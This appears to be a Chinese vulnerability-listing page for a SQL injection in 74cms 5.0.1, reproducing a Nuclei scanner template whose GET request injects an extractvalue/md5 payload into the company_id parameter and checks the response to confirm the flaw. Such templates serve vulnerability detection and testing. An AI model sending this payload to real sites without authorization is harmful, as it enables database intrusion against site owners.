74cms-sqli: 74cms Sql Injection

日期: 2025-08-01 | 影响软件: 74 cms | POC: 已公开

漏洞描述

A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.

PoC代码[已公开]

id: 74cms-sqli

info:
  name: 74cms Sql Injection
  author: princechaddha
  severity: critical
  description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
  reference:
    - https://github.com/possib1e/vuln/issues/3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: 74cms,sqli,vuln
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a'

    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body
# digest: 4a0a0047304502203d6477cb517851f199829e0a4b6cb291fdc460146149da3a4ba0d72fd0ee514e022100a75cd2a8a64118960e07e3a96a9932aa8bcdd4b3f9b1fdc1ab37ab1383b021ab:922c64590222798bb761d5b6d8e72950

相关漏洞推荐